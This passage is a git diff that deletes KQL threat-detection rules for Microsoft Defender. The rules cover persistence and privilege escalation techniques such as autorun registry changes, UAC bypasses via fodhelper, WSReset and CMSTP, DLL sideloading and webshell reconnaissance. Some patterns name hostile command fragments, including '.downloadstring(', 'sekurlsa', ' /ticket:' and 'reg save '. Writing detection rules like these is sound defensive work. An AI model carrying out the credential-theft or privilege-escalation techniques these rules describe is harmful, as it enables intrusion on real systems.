ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv"))
\ No newline at end of file
diff --git a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql b/Persistence/Webshell_Tool_Reconnaissance_Activity.kql
deleted file mode 100644
index 84af50a2..00000000
--- a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Cian Heasley, Florian Roth (Nextron Systems)
-// Date: 2020/07/22
-// Level: high
-// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
-
-// Tags: attack.persistence, attack.t1505.003
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help")
\ No newline at end of file
diff --git a/Persistence/WinSock2_Autorun_Keys_Modification.kql b/Persistence/WinSock2_Autorun_Keys_Modification.kql
deleted file mode 100644
index 62710efd..00000000
--- a/Persistence/WinSock2_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))
\ No newline at end of file
diff --git a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql b/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql
deleted file mode 100644
index ac3d2959..00000000
--- a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/22
-// Level: medium
-// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
-// Tags: attack.persistence, attack.t1547.015
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
\ No newline at end of file
diff --git a/Persistence/Winget_Admin_Settings_Modification.kql b/Persistence/Winget_Admin_Settings_Modification.kql
deleted file mode 100644
index 4043350a..00000000
--- a/Persistence/Winget_Admin_Settings_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: low
-// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A"
\ No newline at end of file
diff --git a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql b/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql
deleted file mode 100644
index 9143ea08..00000000
--- a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-Which allows for multiple Remote Desktop connection sessions to be opened at once.
-This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql b/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql
deleted file mode 100644
index bbc905d0..00000000
--- a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: high
-// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
-Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
-
-// Tags: attack.persistence, attack.t1547.004
-DeviceRegistryEvents
-| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon"
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql
deleted file mode 100644
index 30f433a7..00000000
--- a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index bb361746..00000000
--- a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\Explorer\\Browser Helper 
Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey contains "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe"))))
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index 54e850a7..00000000
--- a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and (not((RegistryValueData in~ ("(Empty)", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"))))
\ No newline at end of file
diff --git a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
deleted file mode 100644
index ec001999..00000000
--- a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/21
-// Level: medium
-// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
-// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql b/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql
deleted file mode 100644
index 8dbd183f..00000000
--- a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Semanur Guneysu @semanurtg, oscd.community
-// Date: 2020/10/28
-// Level: high
-// Description: Detection of unusual child processes by different system processes
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD ")))
\ No newline at end of file
diff --git a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql b/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql
deleted file mode 100644
index d7eb1414..00000000
--- a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp")
\ No newline at end of file
diff --git a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql b/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql
deleted file mode 100644
index 0c2064b2..00000000
--- a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and ProcessIntegrityLevel =~ "System")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql
deleted file mode 100644
index d35ec172..00000000
--- a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: high
-// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql b/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql
deleted file mode 100644
index 76abcf3f..00000000
--- a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using a fileless method
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql b/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql
deleted file mode 100644
index 59a7340a..00000000
--- a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nextron Systems
-// Date: 2022/01/06
-// Level: high
-// Description: Detects the setting of the environement variable "windir" to a non default value.
-Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql b/Privilege Escalation/Bypass_UAC_via_CMSTP.kql
deleted file mode 100644
index 8ff3d7ea..00000000
--- a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql b/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql
deleted file mode 100644
index 99e8774a..00000000
--- a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql b/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql
deleted file mode 100644
index 3524a28c..00000000
--- a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
-// Date: 2019/10/24
-// Level: high
-// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/COM_Hijack_via_Sdclt.kql b/Privilege Escalation/COM_Hijack_via_Sdclt.kql
deleted file mode 100644
index 91b9bc53..00000000
--- a/Privilege Escalation/COM_Hijack_via_Sdclt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omkar Gudhate
-// Date: 2020/09/27
-// Level: high
-// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
-// Tags: attack.privilege_escalation, attack.t1546, attack.t1548
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql b/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
